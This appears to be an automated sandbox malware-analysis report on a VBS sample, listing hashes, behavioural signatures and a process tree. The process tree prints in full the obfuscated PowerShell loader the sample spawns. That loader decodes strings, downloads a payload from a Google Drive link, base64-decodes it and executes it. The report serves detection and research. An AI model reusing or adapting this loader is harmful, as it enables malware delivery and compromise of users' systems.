Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64 arch:x86 image:win7-20240419-en locale:en-us os:windows7-x64 system -
submitted
08/05/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859.vbs
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859.vbs
Resource
win10v2004-20240419-en
General
-
Target
1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859.vbs
-
Size
10KB
-
MD5
0af963bf87233b7550e02def326787b2
-
SHA1
20e2306b9c77aca90a8db3f6f32f5afbfc7b55bb
-
SHA256
1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859
-
SHA512
e15f5f0f6428cf10371cbc8802ef1df9b8a89a88b704cdceee3f489c04194b024bc35404daa41e113bb033d2deb57b710c9475793257e23882e3a71af834a323
-
SSDEEP
192:J1BzGNLMQFn1gIwTKtrirKkVfT37vDW8hwMMOS5bI1n3y+IqZ4kxN7iySIple8YO:J3xbz8+3xN5pltQXlUp
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2288 WScript.exe 5 2920 powershell.exe 7 2920 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2920 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2288 wrote to memory of 2920 2288 WScript.exe 29 PID 2288 wrote to memory of 2920 2288 WScript.exe 29 PID 2288 wrote to memory of 2920 2288 WScript.exe 29 PID 2920 wrote to memory of 2548 2920 powershell.exe 31 PID 2920 wrote to memory of 2548 2920 powershell.exe 31 PID 2920 wrote to memory of 2548 2920 powershell.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Niacinamide = 1;$Atmosfreforladtes='S';$Atmosfreforladtes+='ubstrin';$Atmosfreforladtes+='g';Function Rejekllings($Filmically){$Musicalen=$Filmically.Length-$Niacinamide;For($Deltalfirmas=1;$Deltalfirmas -lt $Musicalen;$Deltalfirmas+=2){$Bertes+=$Filmically.$Atmosfreforladtes.Invoke( $Deltalfirmas, $Niacinamide);}$Bertes;}function Kommentering251($Plumbite){& ($Svrtbevbnet) ($Plumbite);}$Ataxy=Rejekllings '.MOo z i l lBa./P5,.S0m S(KW iSnFdEo,w sM EN,TS B1,0e..0T; BWNi nE6 4P;D xS6 4B;. r vD:,1 2.1 .s0U)L IGCe c,k.oh/,2 0.1C0A0 1R0I1M .FHiDrUe,f o xU/ 1 2U1I. 0 ';$Minna=Rejekllings ',UdsFeUrL-NATg eBn th ';$Opponenternes=Rejekllings ' hbtGtBpksH:A/T/,d,r i v e..Gg,oeo gSlTeG.Sc o mR/BupcJ? eHx pLoOrAtm=Sd oSw nBl.o aSdP&AiAdO= 1 Q AR-.n I k R y u.BGlU_FiSgHf s.c,0 g.mCn q rRna4g5 3F1 tit p.k ';$Kongerigerne=Rejekllings ' >L ';$Svrtbevbnet=Rejekllings 'Mi,eSxK ';$aforismer='Ekstern';Kommentering251 (Rejekllings 'ESJe t.-,C o nHt.eCnDt - P aItAh. 
UTT:m\LH y dLr oZdDi,c.t y a c eSa.e..,t,x tK ,-.V aNl u e C$TaLf oRrUi.sHmBe rd;O ');Kommentering251 (Rejekllings 'Ui.fM .(at eIsMtE-Mp,a t,h .T.: \SH,yTdTr oCd,ibc t,y.aGckeKaue .Et x.tS)A{.eExAi te}H;P ');$Hilted = Rejekllings '.e c h.o T% aSp pBdGa t,a % \Ts,t r ePg,t.e,gCn i nPgMe rUsD.HSFpSaE ,&U&U ecc h o $ ';Kommentering251 (Rejekllings ' $LgSl oSb a lr:SC o.k e.r,= (TcemSdC U/.cF $ H i lQt.e dF)D ');Kommentering251 (Rejekllings ' $,g.lAo,b a lT: D iRs pBl e.aMsKi nNg,nBe,sGs = $ O p pFoQnKe,nBt eNr nUePs,.Os pRlTiUt (H$NK.ornSgCe r iFg,e r n es)A ');$Opponenternes=$Displeasingness[0];Kommentering251 (Rejekllings '.$ gLlSoCbSa lA:,HBe.i.rMs k,i pB=.N e wG-CO,b j e.c tB USDy.sBtce,mu.BNDe tS.BWUeAb.COl i ePn.tM ');Kommentering251 (Rejekllings '.$AHSeSi r s.kRi p .FHUe,aPdSe.r s.[J$,M ipnSn.aD]F= $NATt.a x y, ');$Lungworts=Rejekllings 'MH.eOifr.sSk iMpv.GD,o,wMnklFoKa.d F iWl eC(F$ OSpSpOoUnKe nLtBeErSn.e,sC,C$KT,hPe oAs,oSphh i.e.sH8,4 )B ';$Lungworts=$Coker[1]+$Lungworts;$Theosophies84=$Coker[0];Kommentering251 (Rejekllings 'L$.gDl oTbSa lU:NLAaAmEeSnMt,aHb iFl e =f(KTWe.s tT- P.aVtLhL A$HTMhIe oFs,o p h iUe.s,8 4I)A ');while (!$Lamentabile) {Kommentering251 (Rejekllings ' $Tg,lMo bSa lE:SB,l.oHdCfGo,r gUi fTt.n i n,g eFr nReTs =K$,t,r,u,e ') ;Kommentering251 $Lungworts;Kommentering251 (Rejekllings 'JSCt.a rStT-.S.l e,e,pS 4O ');Kommentering251 (Rejekllings ',$TgBl o bAaSlB:SLKa m eKn.tIaSb,i l eI=P(UT,e.s t -DPNaFt h .$ TGhKeBo s.o,p h iVe.sa8 4D), ') ;Kommentering251 (Rejekllings 'E$Egdl oAb aVl,: M,a mFaEl.i.gYaS= $Pg lLoCbHa.l :FPBhLoFs.p hdo l iGp.aDsRe +F+L%S$ DSiFsMp.l,eIaUsRi nCg,n.eTs,s,.Sc oRuKnCt ') ;$Opponenternes=$Displeasingness[$Mamaliga];}Kommentering251 (Rejekllings ' $KgAl o.bSa lA:CSteUn.s.a.t iUoHnPs p r e s sTeT C=, ,G,e,t,-MCSo nMtVe.n,tU S$TT hhe o s,oAp h i eSsa8 4. ');Kommentering251 (Rejekllings 'M$.g lDo b a l,:MKliBl t.nPi nSg 1 3O B= .[ASFyNs t eTmM. 
CSoSnKv e.r,t,] :V:OFPrBoRmEB aBsPeJ6C4 Sbt rdi n.g (.$TS e.n s a tNi oSnSsGp ree s.s e )P ');Kommentering251 (Rejekllings ' $sgRlSo.b a l.:SS oPlRdaeBr iDs t. .=P S[TSEy.s tFe,m . T ePxCtA.SE.nDcboHdVi n g ],: :AA,S C III,.uGSe tTSAtbrUisn g,(R$ KFi.l tOn i.n g 1C3.)D ');Kommentering251 (Rejekllings ' $Kg.lRo bTa lM:RBSrCdPsPkLrBeSr ePsL=U$ S,o,l,dUeAr,i.sTtB.Ps uWbisUthr iEnBg.( 3P6s0,8 2,0 , 2 4 4z0.0 )K ');Kommentering251 $Brdskreres;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\stregtegningers.Spa && echo $"3⤵PID:2548
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
68KB
MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa